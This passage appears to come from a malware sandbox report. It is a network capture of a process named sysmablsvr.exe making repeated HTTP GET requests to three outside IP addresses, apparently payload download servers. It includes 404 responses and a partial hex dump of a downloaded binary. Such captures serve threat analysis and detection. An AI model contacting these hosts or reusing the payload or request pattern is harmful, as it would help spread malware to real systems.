                                            Sep 17, 2024 23:10:34.078023911 CEST1236INData Raw: a3 9e 70 26 2d 00 71 9f 71 d4 4d 7a d0 f3 1c 0f 04 10 cb 9a 79 d7 26 8f 1d c1 cf 2b da 1a a8 b2 33 fa 6c 30 25 2e 24 74 32 6b 2f 20 ad 89 f4 1c 13 0e 03 f8 7a e3 ea 88 da f8 db d8 4b 75 28 fb 0d 03 74 64 2d c0 6f ec 7c 04 02 95 be 55 6f e0 c2 7c
                                            Data Ascii: p&-qqMzy&+3l0%.$t2k/ zKu(td-o|Uo|-mh3O4nloL;zvMwI6j( jxm%MN7c3"E eBQ%k75R3FF5B|Ws
                                            Sep 17, 2024 23:10:34.078056097 CEST1236INData Raw: 91 49 c1 2a 12 b8 b0 a9 d8 17 cb 3a 12 c7 e3 7c a5 03 4f b4 e0 6f 9c 0f e7 05 56 89 13 01 2e 57 8d a6 90 2d b4 9d 7e 7d ed 69 48 01 1d 6a 10 ef fe 4b e2 e5 f5 a4 22 95 85 0f af 55 50 55 e5 fb b7 be 00 67 40 4d f9 41 19 09 d0 1c fb 85 ca 46 e9 39
                                            Data Ascii: I*:|OoV.W-~}iHjK"UPUg@MAF9o_<,_7VMV>0pYZley?SAe~r$S0B(wtV74l#F{kf?se_<A9f^Lc}/ :DC=/~2JhY"j
                                            Sep 17, 2024 23:10:34.078089952 CEST1236INData Raw: 33 25 5a 99 e4 c8 3a 3b b9 7d 52 56 ea 5a fd 47 b2 99 75 9a fe 01 89 11 e0 f9 89 a0 f0 57 aa 9a e0 f3 6a 1f db 8b 59 f6 8e 92 a8 6b d0 c0 d0 81 23 b7 de 98 3d 07 b3 98 4f 84 16 60 b3 dd ab 53 0a e4 77 2b cc e6 31 65 b3 5f 58 b3 04 3f 64 c3 84 f3
                                            Data Ascii: 3%Z:;}RVZGuWjYk#=O`Sw+1e_X?dVqB)?d4SDeF!/V!Wi((3QPn|CSe,CJ4s`j:iK<}"X'sTfDxmo}`n}7U;ufk %
                                            Sep 17, 2024 23:10:34.078125000 CEST328INData Raw: 11 e0 1d 41 94 0d 7b ad 86 5c f0 cc 66 96 07 16 da 90 24 25 b4 09 e9 a0 6a 91 dc 3e da 89 4c 4a d8 4c 4e 48 fb 25 0a 8a 95 d7 ae dd ec f1 fd fd 04 37 d4 97 ff 66 94 b5 1d 23 3c e9 a6 1a 51 4c 45 d3 c7 d3 69 4b 47 bc 71 06 00 80 0c 64 1a 39 2f f7
                                            Data Ascii: A{\f$%j>LJLNH%7f#<QLEiKGqd9/P#v8CtHbFh/P;;.;j,Q'B:>[_Mk8!B\dEVd%O:U2,%/
                                            Sep 17, 2024 23:10:34.164159060 CEST8INData Raw: 1b b5 08 3e b6 9b 0d ab
                                            Data Ascii: >


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.449762185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:36.973849058 CEST166OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:37.671324968 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:37 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.449764185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:39.759188890 CEST166OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:40.456398010 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:40 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.449766185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:42.495062113 CEST166OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:43.194051027 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:43 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.449767185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:45.230056047 CEST166OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:46.044327974 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:45 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.449769185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:48.073307037 CEST166OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:48.783287048 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:48 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.44977077.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:51.841388941 CEST163OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.44977277.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:55.674081087 CEST163OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.44977477.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:59.371454954 CEST163OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.44977677.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:03.072380066 CEST163OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.44977777.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:06.791554928 CEST163OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.44977977.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:10.479190111 CEST163OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.44978191.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:15.450918913 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:11:16.142934084 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:16 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O
                                            Sep 17, 2024 23:11:16.142959118 CEST1236INData Raw: 21 22 e3 3a f8 64 ed d3 d6 31 f1 21 9f b6 49 60 d1 75 52 5e ed 96 2c 17 37 72 75 59 0c 38 aa 2c 14 89 b2 94 d9 b1 c4 bd cb 69 56 13 c2 e6 c2 4e 94 42 4c ab a8 13 37 df f1 30 27 8c df 4b 21 83 34 e8 67 0f 49 3f 73 b3 69 87 e4 53 75 2d 56 b7 3f e5
                                            Data Ascii: !":d1!I`uR^,7ruY8,iVNBL70'K!4gI?siSu-V?e2^(+#;,x{NsU{/>=NOcqHh6mzy~U;)/K</|{.f'O,,<=UjE-mJ,),FTuj0}YGHAWZm`%
                                            Sep 17, 2024 23:11:16.142972946 CEST1236INData Raw: 8c 7b d2 94 10 81 50 02 1b f8 df 9c 7f 20 a6 79 88 80 16 5a 89 90 19 d2 e1 21 c1 03 6c bf ad d8 ca 8d 65 26 17 dd 85 b6 e9 74 10 0a 32 72 30 5e 5e 67 6f d9 b8 a2 0f ab d9 01 62 52 0b 22 28 1c dd ba 4f 78 04 0a 46 20 b2 6c 00 d2 ad 9b 5c 62 8b 2f
                                            Data Ascii: {P yZ!le&t2r0^^gobR"(OxF l\b/{X$5vNXE!`FLNcS^)lQ l-Ts}R;$9DT?b(UGnw,";f+Q6vJ?U<6AQtn\&*8~/bUuq8
                                            Sep 17, 2024 23:11:16.142987013 CEST1236INData Raw: ec 6d 0b 68 66 0c c2 5d 9d 2a ae 94 6f df 44 73 f6 1d c9 bb 43 46 5c a8 84 41 08 ae 20 cd 6a b7 f1 a1 ad f4 8f cd 30 2e 38 77 b2 97 65 2d a5 44 ec b4 3b 2b 85 ef 49 41 9f 20 4c e0 76 6d d2 4d 78 9f b7 09 ee 55 58 52 90 1c 29 02 5a a8 4d 8b bc 8a
                                            Data Ascii: mhf]*oDsCF\A j0.8we-D;+IA LvmMxUXR)ZMDBY[A1dG5!j|Gb&v2]G\BspIQqTi3&ys?ok`Y{5*Va'NX^~s/.^[o3(]G9F]cPIT\+2n^a(`
                                            Sep 17, 2024 23:11:16.143003941 CEST1236INData Raw: 10 0d 0b b9 5f 9d 6d e6 92 57 24 32 d1 17 e9 b2 d9 ae 0d 71 a1 d0 f5 93 db 74 24 44 1d 9c e2 88 95 42 43 e3 6d 72 fc 78 0b 0c 45 d3 b3 36 15 f1 98 ab 5f 59 68 bb c4 59 ff aa da 7d a2 ad c0 0d 7b 82 2d 3b 08 0f 12 be 08 9a 06 81 47 b2 42 9b 80 69
                                            Data Ascii: _mW$2qt$DBCmrxE6_YhY}{-;GBiuMPyVE=hEN+kq?<'e>4bcb7Ki<=b"x5V$)VO$&<B0^MgOFzgQTfHO_T1*6vX
                                            Sep 17, 2024 23:11:16.143018961 CEST1120INData Raw: 8a 04 bc 40 2f 0c e0 a9 d6 0a e2 f7 14 8f ae 57 56 3d 2a bf 40 a3 25 fe 65 17 b7 f6 2f da 29 64 e9 6d 89 dc fd a5 6c 7b b4 e5 b8 72 df 7e 9d 10 04 92 d4 19 f1 8d 30 01 70 8c 1d 49 81 05 99 27 00 4f 7d 7a 9d c1 12 6d da 6c 5e f7 bb 5a cd 3d cf 8c
                                            Data Ascii: @/WV=*@%e/)dml{r~0pI'O}zml^Z=ksq#t]ID4CX<Vq/P:_NwB)xJkGC~ua"5I5nKy+Y{?bCI%Xm01:._&u>}@_`T
                                            Sep 17, 2024 23:11:16.143032074 CEST1236INData Raw: ed 57 bc 5e a7 de d0 ca 08 3b b1 83 ad 12 66 d7 f4 8a 06 45 be c6 c0 e3 fb e3 6e e9 5c e8 e6 6f 8c af 7d 2f 69 88 98 05 57 ed 47 7b ff 33 68 b2 3f d4 70 ec d7 ff b8 67 9b ad 89 50 0f 51 e8 28 e6 cb 72 ee 06 71 e6 13 77 cf 4d c8 89 ba 4a f0 95 94
                                            Data Ascii: W^;fEn\o}/iWG{3h?pgPQ(rqwMJ$}7x9i\Dqxc/c,D0W4<~q;Sd BufAHRi1&$gS]<Q~*# E!6:0x[EP-Xn\fv$4X,.
                                            Sep 17, 2024 23:11:16.143045902 CEST1236INData Raw: 0e 4e f9 11 b2 8d d8 10 2a 07 3f 14 6b a0 06 89 1e 8f 4c 81 12 d7 d0 1b ac c4 cd b0 3c d8 20 76 d5 41 12 b3 96 01 0c ee 49 a3 70 81 36 f7 fa bf f8 fa 9c 75 70 e9 08 5f ff fd 46 bc 2e d1 d1 41 84 13 0a 49 2d 97 03 44 56 ca 54 05 26 6d 51 dd 67 c4
                                            Data Ascii: N*?kL< vAIp6up_F.AI-DVT&mQgql&+nw;"+Zt<}XGQHeAlMVf9:.+)vg|{b:9&&Qn1MW.Ob+am9
                                            Sep 17, 2024 23:11:16.143498898 CEST1236INData Raw: 02 6e 5b 0b f4 43 2d 53 71 f7 ac 2d 2b f2 7f 8f 38 d6 33 91 48 11 e5 8c ce 2e 2d 7b 33 4c 87 4b 56 4b 54 78 66 5f 5e a1 2d de c9 23 0f c5 23 a1 52 cc 27 4a 01 ed 82 a2 31 86 95 8d 0d 58 61 dc 29 98 52 1d f6 e4 1a a9 29 22 41 f3 25 dc a2 b8 cf 9b
                                            Data Ascii: n[C-Sq-+83H.-{3LKVKTxf_^-##R'J1Xa)R)"A%Wa00XK7Vcd%AI,GcXF|{Kq0_t-\/r8Nv1Md-=;/93)&'U\]JvjS*g4!]Re
                                            Sep 17, 2024 23:11:16.143513918 CEST1236INData Raw: 5e cb 77 97 b8 9b 35 d8 00 8e c9 26 be c1 47 28 61 c7 54 49 98 71 2e 1e e2 9a 7e 23 85 cb bf ec 16 20 37 3b 01 60 db 2d 26 92 a5 2c c5 60 89 1c fd 6a 10 37 cc 0a a4 df 5e 54 2e 2c c1 60 6f 63 49 1a 67 b9 17 49 4f ec c5 26 ba 4c 50 e9 3e af 9d af
                                            Data Ascii: ^w5&G(aTIq.~# 7;`-&,`j7^T.,`ocIgIO&LP>`<D|<v.>{I;>TJZ~P~NJPl1YLo8bNh4eMrra'\PEC6{E\?&SgIqzEfMCz1U7
                                            Sep 17, 2024 23:11:16.147854090 CEST565INData Raw: fd 3e 70 6c a3 ce f1 ee 12 38 89 e4 e5 fa 45 fe e6 cb 5f 76 98 f3 11 35 77 51 60 78 b0 eb c2 19 c3 e7 9d ee 5a bc 66 bd 32 4b 64 46 20 88 dc 63 c5 02 9c 30 6f e6 f5 5f 45 67 79 61 80 f1 d7 d0 34 88 43 44 53 b2 45 74 cc 82 f5 d6 d8 fe ba 98 dd 79
                                            Data Ascii: >pl8E_v5wQ`xZf2KdF c0o_Egya4CDSEtyY9]#]bo7kY^}'kT=OM=28NKI]uy516_ND3pAGgS_nyR~G^{43e^W-qMw[~PA)LW


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.44978291.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:17.167273045 CEST166OUTGET /1 HTTP/1.1
